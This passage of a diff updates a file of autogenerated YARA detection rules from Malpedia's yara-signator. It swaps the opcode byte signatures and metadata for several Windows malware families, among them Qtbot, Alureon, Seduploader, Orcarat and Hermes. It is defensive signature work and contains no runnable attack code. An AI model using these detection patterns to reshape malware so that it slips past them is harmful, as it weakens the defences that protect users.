-		$sequence_5 = { 75f0 8bcf e8???????? e9???????? ffb5f4fdffff 8b35???????? }
-		$sequence_6 = { e8???????? 8bd8 83e31f 59 c1e306 031cb570750110 59 }
-		$sequence_7 = { 55 8bec 8b4d08 33c0 3b0cc550070110 740a 40 }
-		$sequence_8 = { be???????? 89bd08fcffff 8bd6 e8???????? }
-		$sequence_9 = { 2bf1 33c9 d1fe 2bf7 8d4601 }
-		$sequence_10 = { 83c102 663b45f8 75f4 2b4d08 d1f9 }
-		$sequence_11 = { 66890c16 8d5202 6685c9 75f1 8bcf e8???????? }
-		$sequence_12 = { a3???????? c3 33c0 50 6a01 }
-		$sequence_13 = { 8bd6 8907 668b02 83c202 663bc1 75f5 }
-		$sequence_14 = { 03c9 51 53 56 8934bd20f04100 }
+		$sequence_0 = { 83f801 7411 3d81000000 740a }
+		$sequence_1 = { 4c8bce 89442420 ff15???????? 85c0 750a }
+		$sequence_2 = { 740f 33c9 e8???????? 488bce e8???????? 488b742458 4d85ed }
+		$sequence_3 = { 488d4c2458 4889442458 e8???????? 4839742440 7457 b101 }
+		$sequence_4 = { e8???????? 488b4c2430 4c8bc5 33d2 e8???????? 488b4c2430 4885c9 }
+		$sequence_5 = { 488b8c2490000000 e8???????? 48c784249000000000000000 4d85f6 740f }
+		$sequence_6 = { 48895c2440 e8???????? 4c8b6c2438 4c8bf8 488b442440 }
+		$sequence_7 = { eb78 33c0 488bcf 488907 48894708 48894710 48894718 }
+		$sequence_8 = { 0f84c3000000 6a02 56 50 ff15???????? 85c0 }
+		$sequence_9 = { 740a 83f808 7405 83f811 }
+		$sequence_10 = { 0f84cc020000 8d442438 897c2438 50 6a0c }
+		$sequence_11 = { 8d442420 8d4c2434 50 51 e8???????? }
+		$sequence_12 = { 6a00 e8???????? 8b54240c 52 }
+		$sequence_13 = { 56 ffd3 8944242c 8d542420 }
+		$sequence_14 = { 8b442410 c6400103 8b4c2410 66895902 }
+		$sequence_15 = { c1e902 f3ab 8bca 83c404 83e103 f3aa 8b44241c }
 
 	condition:
-		7 of them and filesize < 479232
+		7 of them and filesize < 2023424
 }
-rule MALPEDIA_Win_Cohhoc_Auto : FILE
+rule MALPEDIA_Win_Data_Exfiltrator_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "79f1d359-2e68-5ef2-92e4-7c353f021a83"
+		id = "1c3e80a4-d035-5215-adaa-66329eac9671"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cohhoc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cohhoc_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.data_exfiltrator"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.data_exfiltrator_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "408be9b45dccb2589014666e6c29650297e9a497c2f3518d6cebc0080adee530"
+		logic_hash = "6297c1d8a56d8255bac738410a860d5a8da8f6a36d36d069cc390dc91a10d95e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122884,34 +123139,34 @@ rule MALPEDIA_Win_Cohhoc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f2ae 8b15???????? 33f6 f7d1 49 03cb }
-		$sequence_1 = { b809000000 c1e909 85c9 7e07 d1f9 40 }
-		$sequence_2 = { c705????????01000000 c705????????84000000 891d???????? 891d???????? }
-		$sequence_3 = { 8994245c010000 ff15???????? 8d542414 8d442424 52 50 ff15???????? }
-		$sequence_4 = { eb0a 8b75f4 c7451800000000 8b45fc 8b3d???????? }
-		$sequence_5 = { 8d9424ac020000 6aff 52 53 53 66ab ffd6 }
-		$sequence_6 = { 85c0 740f 8a4c2404 3808 }
-		$sequence_7 = { 56 8bf8 894c241c 89542418 ff15???????? 6a0a 56 }
-		$sequence_8 = { a1???????? 48 85c0 a3???????? 7f05 bf01000000 6a00 }
-		$sequence_9 = { 33c0 eb05 1bc0 83d8ff 85c0 0f84ba000000 8b4308 }
+		$sequence_0 = { 488b442408 c60000 488b442408 48c7404000000000 488b442408 }
+		$sequence_1 = { c684248a0000008a c684248b0000007b c684248c00000084 c684248d00000085 }
+		$sequence_2 = { 4889842490000000 488d842410010000 488d8c2490000000 488bf8 488bf1 }
+		$sequence_3 = { 33c0 e9???????? 488b442420 488b4018 488b4020 4889442430 }
+		$sequence_4 = { c68424a50000004a c68424a600000070 c68424a700000077 c68424a800000069 c68424a900000077 c68424aa00000074 c68424ab0000006c }
+		$sequence_5 = { 56 57 4881ecb8000000 c744242000000000 33d2 488b8424d0000000 488b4040 }
+		$sequence_6 = { 48837c24300a 7d10 488b442430 4883c030 4889442438 eb1a 488b442430 }
+		$sequence_7 = { ff15???????? 4889842480000000 eb13 488b4c2478 ff15???????? 4889842480000000 }
+		$sequence_8 = { e8???????? 8bc0 41b840000000 ba00300000 8bc8 e8???????? 4889442468 }
+		$sequence_9 = { 4889542410 48894c2408 4883ec48 ff15???????? 41b8ffff0000 ba08000000 488bc8 }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 107520
 }
-rule MALPEDIA_Win_Qtbot_Auto : FILE
+rule MALPEDIA_Win_Orcarat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b6cd7830-06d4-528e-badc-1164fe765257"
+		id = "66428b7d-391a-549a-8224-a32cd382ad2d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qtbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.qtbot_auto.yar#L1-L165"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.orcarat_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "b0461cc5472670ef13bed91b802682965df84a278581734494bb0db4dd3456a2"
-		score = 60
-		quality = 25
+		logic_hash = "5f94f67164edef88389c383016b172885e074830b2ead0db2794d29f7191cd25"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -122923,38 +123178,32 @@ rule MALPEDIA_Win_Qtbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 e8???????? 3b4508 740b }
-		$sequence_1 = { 33c0 53 8a1a 6bc80d }
-		$sequence_2 = { 85c0 742a 8b049a 03c6 }
-		$sequence_3 = { 8b400c 8b7014 ad 8b00 }
-		$sequence_4 = { 8b049a 03c6 50 e8???????? }
-		$sequence_5 = { 33f6 8bde 85ff 7455 8b4510 89450c 8d4301 }
-		$sequence_6 = { 89450c 8d4301 0fb6d8 8a941dfcfeffff 0fb6c2 }
-		$sequence_7 = { 84db 75e9 5b 5d c20400 }
-		$sequence_8 = { 53 ff15???????? 837c241000 7423 8b442418 8b4c2410 }
-		$sequence_9 = { 837e04ff 8bd8 8d7e08 7504 8b2f eb02 8bef }
-		$sequence_10 = { 833e05 7521 6a10 6a40 ff15???????? }
-		$sequence_11 = { 8b0c855c300010 c1e705 33d2 03fe 42 837dfcff 8955dc }
-		$sequence_12 = { 837efcff 7518 8b46f8 8b04855c300010 }
-		$sequence_13 = { 8b4ef8 83f907 0f8781000000 ff248dfb240010 881f eb76 ff30 }
-		$sequence_14 = { 8b55fc 8d0c8a 894dfc eb0e 8b14957c300010 }
-		$sequence_15 = { 0fb6805a210010 ff2485f6200010 8b8614080000 3b45f4 7e03 }
+		$sequence_0 = { 8b9424401d0000 83c9ff 8bfa 33c0 f2ae f7d1 89442410 }
+		$sequence_1 = { 03c8 8d148d7ca04000 8bcd 52 }
+		$sequence_2 = { f7d1 2bf9 81c575020000 8bc1 }
+		$sequence_3 = { f2ae 8d542410 8d8424385a0000 f7d1 52 50 894c241c }
+		$sequence_4 = { 50 8d442414 49 50 51 52 53 }
+		$sequence_5 = { 50 894c241c 51 8d4c242c c744241c00080000 51 }
+		$sequence_6 = { 6a0a 52 6aff e8???????? 8d7c2428 83c9ff }
+		$sequence_7 = { c21800 8b8c242c080000 55 55 }
+		$sequence_8 = { 8d0c2e 50 51 e8???????? 8b54242c 83c418 03d6 }
+		$sequence_9 = { 740b 83f801 75dd 396c2410 75d7 bf???????? 83c9ff }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Mylobot_Auto : FILE
+rule MALPEDIA_Win_Seduploader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "10f8483b-f798-51f2-8a0d-4ad60f69bcdb"
+		id = "abd18501-c80d-5d3c-830d-4070c5a4c096"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mylobot_auto.yar#L1-L165"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.seduploader_auto.yar#L1-L109"
 		license_url = "N/A"
-		logic_hash = "a859373208876596e4d4c654a67f12e66a950382de85503fc39b74c533ee7259"
+		logic_hash = "ad39ca6734688a1ba0a401112f23db476ff01fef94039db8596308ec3fce36d4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122968,38 +123217,32 @@ rule MALPEDIA_Win_Mylobot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8a4c2413 84c9 888c04bc010000 8b442414 }
-		$sequence_1 = { 50 e8???????? 83c424 8d7c2440 33c0 6a0a 59 }
-		$sequence_2 = { 8b6e24 03c7 03ef 89442414 85c9 }
-		$sequence_3 = { 6810270000 ff15???????? 83bf0801000001 7509 5f 5e 33c0 }
-		$sequence_4 = { 50 e8???????? 59 8a4c2413 84c9 888c048c050000 }
-		$sequence_5 = { e8???????? 8b0d???????? 898170010000 a1???????? ffb070010000 }
-		$sequence_6 = { 8bd0 e8???????? e9???????? 3c13 0f858f000000 }
-		$sequence_7 = { 8364242000 8d8424bc000000 50 e8???????? 50 }
-		$sequence_8 = { ffd7 85c0 7517 a1???????? }
-		$sequence_9 = { ffd6 a1???????? 6aff 50 ff15???????? }
-		$sequence_10 = { 83c428 a3???????? a3???????? a3???????? a3???????? a1???????? }
-		$sequence_11 = { 8b0d???????? 6a01 6a00 6a00 6a00 }
-		$sequence_12 = { 8b0f 8b5618 33db 898de0fdffff }
-		$sequence_13 = { e8???????? 8d95d0fdffff 52 b822b19818 }
-		$sequence_14 = { 7511 83c802 50 8d9558f5ffff 52 }
-		$sequence_15 = { 51 57 ff15???????? 8b35???????? 8d642400 8b5508 }
+		$sequence_0 = { ff763c e8???????? 83c40c 3b4508 }
+		$sequence_1 = { 50 e8???????? 8b4510 83c6fe 8930 }
+		$sequence_2 = { 83c6fe 8930 8d4601 50 e8???????? }
+		$sequence_3 = { 83c6fe 8930 8d4601 50 }
+		$sequence_4 = { e8???????? 6a01 8d45fe 50 }
+		$sequence_5 = { e8???????? 8b4510 83c6fe 8930 }
+		$sequence_6 = { c3 56 6a3e 8bf1 e8???????? }
+		$sequence_7 = { 89b5ecfeffff 89b5f0feffff 89b5f4feffff e8???????? 83c40c }
+		$sequence_8 = { 50 e8???????? 8b4510 83c6fe }
+		$sequence_9 = { e8???????? 8b4510 83c6fe 8930 8d4601 }
 
 	condition:
-		7 of them and filesize < 8028160
+		7 of them and filesize < 401408
 }
-rule MALPEDIA_Win_Alureon_Auto : FILE
+rule MALPEDIA_Win_Mozart_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a73dc24e-01b5-5374-84bf-44615f6f8c40"
+		id = "658c5c82-39a0-5f12-babc-c6dbc8b0b70f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.alureon_auto.yar#L1-L177"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mozart_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "3ffa46b9256035a0465adbbc3bd0212addd530491396c5f57b5bebbc944d0354"
+		logic_hash = "ebee3e9c74f8823fb3c803b1df028db4b37d86893944724b3d21b6503c5bed66"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123013,38 +123256,32 @@ rule MALPEDIA_Win_Alureon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 75f8 8b55ec 8b7de8 52 89530c 897b10 }
-		$sequence_1 = { 8d4520 48 89442430 c744242814d00400 48 894c2420 }
-		$sequence_2 = { 8bd0 8955fc 85d2 0f8451010000 32c0 8bce }
-		$sequence_3 = { 8d43d8 66894520 8bc1 44 894d2c c1e818 41 }
-		$sequence_4 = { 88442447 8d442424 50 6a60 }
-		$sequence_5 = { 668945f4 8d45f0 50 6a01 }
-		$sequence_6 = { 48 81ecf0000000 48 8d6c2470 48 83e5e0 33c0 }
-		$sequence_7 = { ff75f8 ff15???????? 85c0 7865 ff75b8 8d8598f9ffff 68???????? }
-		$sequence_8 = { 50 8d85f8fcffff 68???????? 50 ffd6 83c418 }
-		$sequence_9 = { c645f636 c645f71f c645f83d c645f929 c645fa3b c645fb00 e8???????? }
-		$sequence_10 = { ab ab ab ab 8d442444 8944247c 53 }
-		$sequence_11 = { 53 57 8975f4 e8???????? 8b45f4 83c40c }
-		$sequence_12 = { 74c5 395df8 7409 ff75f8 ff15???????? }
-		$sequence_13 = { c645d002 c645d111 c645d23a c645d330 c645d401 }
-		$sequence_14 = { 75c5 56 ff15???????? 8a45ff 5e 5b c9 }
-		$sequence_15 = { 85c0 0f84f2020000 53 53 6a03 }
+		$sequence_0 = { c705????????01000000 c705????????04000000 890d???????? 890d???????? 890d???????? ff15???????? }
+		$sequence_1 = { 33f6 c644241800 eb39 80fb3d }
+		$sequence_2 = { e8???????? 81c404040000 c3 55 e8???????? 8b8c2414040000 83c404 }
+		$sequence_3 = { c6042900 8b4c244c 5d b801000000 5b e8???????? }
+		$sequence_4 = { 51 53 b8???????? 56 33d2 }
+		$sequence_5 = { 880429 41 83c603 8d46ff }
+		$sequence_6 = { 8b8c2450010000 83c40c e8???????? 5f }
+		$sequence_7 = { c605????????76 c605????????2e a2???????? c605????????78 a2???????? c605????????00 }
+		$sequence_8 = { 83fe10 7409 33f6 c644241800 eb39 80fb3d 740e }
+		$sequence_9 = { 5f 5e 5d 5b 8bc2 f7d8 }
 
 	condition:
-		7 of them and filesize < 278528
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Webc2_Yahoo_Auto : FILE
+rule MALPEDIA_Win_Unidentified_037_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4eedce59-ab20-52b2-90a4-b849754d3956"
+		id = "12311ab5-e4c5-520c-9e45-de0627bcb40b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_yahoo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_yahoo_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_037_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "3d2dd09691f298cf3eef54b62db7cef2339bebabc7bbad3cbeaa6cf7557fae03"
+		logic_hash = "1d2de4db39b1900c0def6a2d43ab52baecc925bfad5faca5ff76425cebd9b30d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123058,34 +123295,34 @@ rule MALPEDIA_Win_Webc2_Yahoo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff75e4 ffd7 85c0 7453 837dec00 }
-		$sequence_1 = { 8d8507ffffff be???????? 50 56 e8???????? 6a00 }
-		$sequence_2 = { 8365c800 6a09 59 33c0 8d7dcc 53 f3ab }
-		$sequence_3 = { 57 ff75fc 0345f4 50 e8???????? 56 e8???????? }
-		$sequence_4 = { eb9f b8???????? c3 55 8bec }
-		$sequence_5 = { 59 8bc6 5e c20400 33c0 c701???????? 89819c841e00 }
-		$sequence_6 = { 8816 8a11 8817 8a10 33db }
-		$sequence_7 = { 50 ff15???????? 6a64 e8???????? 8d85fcd7ffff }
-		$sequence_8 = { c686????????40 46 33c9 53 c686????????23 }
-		$sequence_9 = { 8d85fcd7ffff 57 50 ebb4 6a64 5b }
+		$sequence_0 = { b9ff000000 33c0 8dbc242d040000 889c242c040000 be???????? }
+		$sequence_1 = { 52 e8???????? 55 8d4c2414 }
+		$sequence_2 = { e8???????? 56 8d8c24ac010000 8b542420 2bd6 8d8414ac010000 50 }
+		$sequence_3 = { 83c704 48 75e2 8b442410 5b 33d2 33ff }
+		$sequence_4 = { 8d8424b8040000 52 50 ff15???????? 8d8c24b8040000 51 ff15???????? }
+		$sequence_5 = { 6a00 8d4c2424 681f000f00 51 ffd5 85c0 }
+		$sequence_6 = { 83c002 4f 75f1 8b4604 894e08 66c704480000 8b4d14 }
+		$sequence_7 = { 3bf5 7639 8b542418 55 8d4c2414 8d3c32 57 }
+		$sequence_8 = { 03f3 81ec84020000 b9a1000000 8bfc f3a5 e8???????? 85c0 }
+		$sequence_9 = { 8801 eb09 51 e8???????? 83c404 8b4c240c 895e04 }
 
 	condition:
-		7 of them and filesize < 8060928
+		7 of them and filesize < 167936
 }
-rule MALPEDIA_Win_Racket_Auto : FILE
+rule MALPEDIA_Win_Op_Blockbuster_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fdbc67f2-dd9c-564f-803b-5a571eceba53"
+		id = "54037fb5-02e6-50fe-b72a-3b42b6ceaa52"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.racket"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.racket_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.op_blockbuster"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.op_blockbuster_auto.yar#L1-L326"
 		license_url = "N/A"
-		logic_hash = "8c447bff92b42700b626fab2f15edaccf604f14572851cce781a5a45ae5fbde2"
+		logic_hash = "4209e51c2985f19271abc0c98d2263ec2c893b90a69757edcf9738231e4cef57"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -123097,32 +123334,56 @@ rule MALPEDIA_Win_Racket_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 757b e8???????? 3906 7572 837e0c00 756c 8b4608 }
-		$sequence_1 = { 7507 c74634f4af0510 6a00 57 8bce e8???????? 5f }
-		$sequence_2 = { e8???????? 8b5590 8b4d8c 8bbd70ffffff 83c104 83ea01 894d8c }
-		$sequence_3 = { e8???????? 83c40c 8d8ddcfaffff 68???????? e8???????? 6804010000 8d85e0fbffff }
-		$sequence_4 = { 8b9568ffffff 8b4214 394218 7420 8b4dac 8908 c7400400000000 }
-		$sequence_5 = { 50 e8???????? 6a00 8d8558f6ffff 50 6aff 8d855cf6ffff }
-		$sequence_6 = { 8b4da4 eb03 8b45e0 837dc400 893488 745c 8b45f4 }
-		$sequence_7 = { 660f56c3 660f58e0 660fc5c400 25f0070000 660f28a050f70510 660f28b840f30510 660f54f0 }
-		$sequence_8 = { 56 e8???????? e8???????? 6a00 ffb5c8feffff 56 e8???????? }
-		$sequence_9 = { 8bd0 8b37 2bd6 8b4d0c 8945e0 b8ffa16f6b f7ea }
+		$sequence_0 = { f3ab 66ab aa 5f 85f6 5e }
+		$sequence_1 = { 56 57 683c400000 6a40 }
+		$sequence_2 = { e8???????? 6800400000 6a00 ff15???????? }
+		$sequence_3 = { 8a08 80f920 7505 83c021 }
+		$sequence_4 = { 8b497c 85c9 7407 51 }
+		$sequence_5 = { 6a00 e8???????? 85c0 7407 83f802 }
+		$sequence_6 = { ff15???????? 6808400000 6a40 ff15???????? }
+		$sequence_7 = { 68???????? ff15???????? 85c0 7412 68???????? 50 e8???????? }
+		$sequence_8 = { 68???????? 56 ff15???????? 68???????? 56 a3???????? e8???????? }
+		$sequence_9 = { 56 50 8d45fc 6a04 50 }
+		$sequence_10 = { 7f04 0409 eb06 3c72 }
+		$sequence_11 = { 3c69 7c08 3c70 7f04 0409 }
+		$sequence_12 = { ff15???????? 85c0 0f84aa000000 488b4c2448 488d442440 }
+		$sequence_13 = { 6689742434 4088b42450010000 e8???????? 488d4c2441 }
+		$sequence_14 = { 6a00 ff15???????? 8bf8 85ff 7504 5f 5e }
+		$sequence_15 = { 68???????? 56 e8???????? 56 e8???????? 83c438 }
+		$sequence_16 = { 03d0 8b05???????? 6bc03c 0305???????? 3bc2 7f17 8b05???????? }
+		$sequence_17 = { 53 6a01 57 e8???????? 56 e8???????? 83c414 }
+		$sequence_18 = { b910040000 ff15???????? 488bd8 4885c0 7445 488d442448 4c8d4c2450 }
+		$sequence_19 = { b930750000 ff15???????? f605????????02 740e ff15???????? f7d7 23f8 }
+		$sequence_20 = { ff15???????? 85f6 7404 85c0 }
+		$sequence_21 = { c3 33c0 ebf8 53 33db 391d???????? 56 }
+		$sequence_22 = { 4c89b424e8030000 4c89bc24e0030000 448bf3 b800400000 458bc5 4c8d4c2448 }
+		$sequence_23 = { ff15???????? 8bc6 5f 5e c3 33c0 }
+		$sequence_24 = { 8816 eb3e c6060d 8b048dd8974400 8854382a eb2e }
+		$sequence_25 = { 8bd1 d1f8 2b14c5a8324400 7413 85d2 7905 }
+		$sequence_26 = { 770f 0fb7c1 0fb680e0ff4300 83e00f eb02 33c0 }
+		$sequence_27 = { 8b4508 898850030000 8b4508 59 c7404840854400 8b4508 }
+		$sequence_28 = { 80f979 7f06 b3db 2ad9 }
+		$sequence_29 = { 50 68???????? 50 68???????? 68???????? 8d8514f2ffff }
+		$sequence_30 = { 6a00 ff15???????? 57 8bd8 ff15???????? 8b4c2414 68???????? }
+		$sequence_31 = { 83e01f 8b34b500a34000 8d04c0 8b0486 83f8ff }
+		$sequence_32 = { 6800000080 53 ff15???????? 8bf8 83c8ff 3bf8 }
+		$sequence_33 = { ff5108 6a01 5e ff15???????? 8bc6 5f }
 
 	condition:
-		7 of them and filesize < 985088
+		7 of them and filesize < 74309632
 }
-rule MALPEDIA_Win_Lightneuron_Auto : FILE
+rule MALPEDIA_Win_Alma_Communicator_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4c2cf7c9-a6e0-519d-9025-fdcf709d68d0"
+		id = "d8b295a7-7b28-5e6b-b5af-98c76d267598"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightneuron"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lightneuron_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.alma_communicator_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "5722f811a0c9c408e5a8640f3b100c752da3b058e0e2eee886d08d397042326e"
+		logic_hash = "904bfc03a43918532b57223d9b7b36661a7e5069ea789e70ed097e9455614910"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123136,32 +123397,32 @@ rule MALPEDIA_Win_Lightneuron_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 410fafd5 0fafce 8bc2 c1e210 c1e810 4403d0 8bc1 }
-		$sequence_1 = { c1c108 33d1 4333949ed0ff0200 413354240c 83c3fe 0f8458010000 448bdb }
-		$sequence_2 = { 0f87aa010000 48895c2460 8d5ffd 48896c2468 85db 0f8e77010000 66666666660f1f840000000000 }
-		$sequence_3 = { 4c8be1 448d4210 488d4c2420 ffc6 c1e604 498be9 e8???????? }
-		$sequence_4 = { 4c897c2428 4533c9 44897c2420 488d0d2fe80200 4533c0 ba74270000 e8???????? }
-		$sequence_5 = { 48896c2468 4885ed 7409 8b742450 e9???????? 83782804 757e }
-		$sequence_6 = { 4885c0 4c8d842480000000 498bcf 480f45d0 e8???????? 488b05???????? 4c8b05???????? }
-		$sequence_7 = { 41336c2408 418b9486d0f70200 410fb6c0 418b8c86d0f70200 c1ca08 410fb6c1 c1c110 }
-		$sequence_8 = { 48c78424a8000000ffffffff 48c78424b000000000000000 48c78424b800000001000000 48c78424c000000002000000 48c78424c800000003000000 33c0 83f801 }
-		$sequence_9 = { ffe1 488b4318 488d942480000000 41b802000000 0fb74808 888c2480000000 66c1e908 }
+		$sequence_0 = { 83f802 7509 80bdfdfdffff3a 7429 }
+		$sequence_1 = { 89442414 8bf1 8b4c2424 85c9 }
+		$sequence_2 = { 8bca 8d542424 83e103 f3a4 8b4c2414 6a01 }
+		$sequence_3 = { 8b4508 dd00 ebc6 c745e018514100 e9???????? c745e020514100 }
+		$sequence_4 = { 59 59 eb14 6a10 68???????? }
+		$sequence_5 = { 47 84c0 75f8 be???????? 8d85fcfbffff 68ff010000 50 }
+		$sequence_6 = { ba???????? 8901 66a1???????? 51 66894104 }
+		$sequence_7 = { 0f4ecb 8bd9 7fe6 8bfe 8d4f01 }
+		$sequence_8 = { c6840508faffff00 33c9 8a840d08faffff 88840d20f6ffff }
+		$sequence_9 = { 53 56 33f6 8955f8 8bd9 57 }
 
 	condition:
-		7 of them and filesize < 573440
+		7 of them and filesize < 245760
 }
-rule MALPEDIA_Win_Longwatch_Auto : FILE
+rule MALPEDIA_Win_Hermes_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b41781a5-fa9e-5caa-89a9-6b017c4409b3"
+		id = "5ac17fa7-a096-5e04-8e0d-a201ab441e04"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.longwatch"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.longwatch_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hermes_auto.yar#L1-L112"
 		license_url = "N/A"
-		logic_hash = "7e9f24cefc29fec880f531c16b44bc6a332c0d308ff5c0a0db91cf7bbb28f078"
+		logic_hash = "43e558aafd9a673bf17e8773d823614dc4de0d10e8aa93baebe8c03b07e12d71"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123175,32 +123436,32 @@ rule MALPEDIA_Win_Longwatch_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 8b5d10 8b0485a00b4300 56 8b7508 }
-		$sequence_1 = { 68???????? e8???????? 83c404 6a00 ff15???????? 85c0 }
-		$sequence_2 = { 8b0485a00b4300 f644082801 7406 8b440818 5d }
-		$sequence_3 = { 8be5 5d 8be3 5b c3 33c0 50 }
-		$sequence_4 = { e9???????? 6a40 e9???????? 6a23 }
-		$sequence_5 = { 85c0 0f8559010000 e8???????? c70021000000 e9???????? 894ddc c745e01c954200 }
-		$sequence_6 = { 8b41e0 8b4004 c74408e090bb4200 8b41e0 8b5004 }
-		$sequence_7 = { 75de 33c0 85c0 0f94c0 c3 1bc0 }
-		$sequence_8 = { 0f8484000000 8b45f0 8b0485a00b4300 8a44022b }
-		$sequence_9 = { 8975f0 c745f4dc804200 8b7485bc 8d4601 8945b8 }
+		$sequence_0 = { 6a79 59 f7f1 83c261 }
+		$sequence_1 = { ff15???????? 33d2 6a79 59 f7f1 83c261 }
+		$sequence_2 = { 6810660000 ff75fc ff15???????? 85c0 }
+		$sequence_3 = { 50 8d45fc 50 ff15???????? 6a20 }
+		$sequence_4 = { 83c801 50 6a01 ff75fc ff15???????? }
+		$sequence_5 = { 8b4508 83c801 50 6a01 }
+		$sequence_6 = { 7508 6a01 ff15???????? 8be5 5d }
